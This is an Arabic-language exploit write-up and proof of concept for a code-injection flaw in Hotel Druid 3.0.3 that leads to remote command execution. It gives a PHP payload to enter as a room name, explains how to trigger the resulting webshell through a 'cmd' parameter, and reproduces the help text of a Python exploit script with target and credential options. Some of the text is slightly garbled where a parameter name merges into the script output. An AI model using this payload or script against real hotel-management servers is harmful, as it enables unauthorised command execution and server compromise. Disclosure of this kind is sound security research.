
Hotel Druid 3.0.3 حقن الكود إلى تنفيذ الأوامر عن بعد
تم العثور على ثغرة أمنية من نوع حقن الكود (Code Injection) في تطبيق Hotel Druid v3.0.3، يمكن للمهاجم استغلالها لتنفيذ أوامر عن بُعد على الخادم.
للاستغلال الناجح، يجب أن يمتلك المهاجم صلاحية إضافة غرفة جديدة.
تحدث الثغرة لأن أسماء الغرف تُخزَّن داخل ملف باسم /dati/selectappartamenti.php باستخدام العلامات المزدوجة (Double Quotes).
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
للاستغلال الناجح، قم بإضافة غرفة بالحمولة التالية كاسم للغرفة.
{${system($_REQUEST[cmd])}}
بعد إضافة غرفة جديدة، انتقل إلى /dati/selectappartamenti.php وقم بتفعيل الـ webshell عن طريق تمرير أمر باستخدام المعامل .
cmdusage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help show this help message and exit
required arguments:
-t TARGET, --target TARGET
Target URL. Example : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
password
--noauth If No authentication is required to access the dashboard
إذا كان التطبيق لا يتطلب مصادقة.
استخدم العَلَم --noauth لعدم إجراء مصادقة.

إذا كان الخادم يتطلب مصادقة، استخدم --username و --password لإجراء المصادقة.

الباحث وكاتب الإثبات (POC) - 0z09e